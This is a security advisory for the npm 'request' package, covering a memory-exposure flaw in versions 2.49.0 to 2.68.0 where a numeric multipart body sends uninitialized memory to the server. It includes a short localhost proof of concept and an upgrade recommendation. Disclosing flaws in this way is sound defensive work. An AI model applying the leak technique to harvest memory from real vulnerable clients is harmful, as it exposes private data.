GHSA-7xfp-9c55-5vqj

    Dashboard / Vulnerabilities / GHSA-7xfp-9c55-5vqj

    GHSA-7xfp-9c55-5vqj

    Published: 9 Nov 2018Last Modified: 8 Nov 2023

    Summary: Remote Memory Exposure in request

    Details: Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body. ## Proof of Concept ```js var request = require('request'); var http = require('http'); var serveFunction = function (req, res){ req.on('data', function (data) { console.log(data) }); res.end(); }; var server = http.createServer(serveFunction); server.listen(8000); request({ method: "POST", uri: 'http://localhost:8000', multipart: [{body:500}] },function(err,res,body){}); ``` ## Recommendation Update to version 2.68.0 or later

    Affected packages

    Package

    Name: request

    Purl: pkg:npm/request

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 2.49.0
    Fixed -2.68.0

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High